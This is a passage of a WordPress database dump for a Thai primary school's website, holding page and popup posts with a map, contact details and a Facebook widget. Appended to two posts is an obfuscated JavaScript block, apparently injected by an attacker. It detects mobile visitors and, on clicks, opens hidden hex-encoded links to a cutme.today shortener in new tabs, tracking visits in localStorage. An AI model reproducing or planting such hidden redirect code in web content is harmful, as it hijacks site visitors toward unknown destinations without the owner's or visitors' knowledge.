src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-01 09:36:42','2024-08-01 02:36:42','',14,'http://pakhaeng.ssk.in.th/?p=323',0,'revision','',0),
(324,1,'2024-08-01 09:47:22','2024-08-01 02:47:22','','ข้อมูลผู้บริหารสถานศึกษา','','publish','closed','closed','','%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%a8%e0%b8%b6%e0%b8%81','','','2024-08-01 09:57:02','2024-08-01 02:57:02','',0,'http://pakhaeng.ssk.in.th/?post_type=tmm&#038;p=324',0,'tmm','',0),
(325,1,'2024-08-01 09:42:10','2024-08-01 02:42:10','','ผอ-1','','inherit','','closed','','%e0%b8%9c%e0%b8%ad-1-2','','','2024-08-01 09:42:10','2024-08-01 02:42:10','',324,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ผอ-1.png',0,'attachment','image/png',0),
(326,1,'2024-08-01 09:46:54','2024-08-01 02:46:54','','ผอ-1','','inherit','','closed','','%e0%b8%9c%e0%b8%ad-1-3','','','2024-08-01 09:46:54','2024-08-01 02:46:54','',324,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ผอ-1-1.png',0,'attachment','image/png',0),
(328,1,'2024-08-01 09:52:46','2024-08-01 02:52:46','<!-- wp:shortcode -->\n[tmm name=\"%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%a8%e0%b8%b6%e0%b8%81\"]\n<!-- /wp:shortcode -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลผู้บริหาร','','publish','closed','closed','','%e0%b8%82%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b8%b9%e0%b8%a5%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%a3','','','2024-08-01 09:54:47','2024-08-01 02:54:47','',0,'http://pakhaeng.ssk.in.th/?post_type=popupbuilder&#038;p=328',0,'popupbuilder','',0),
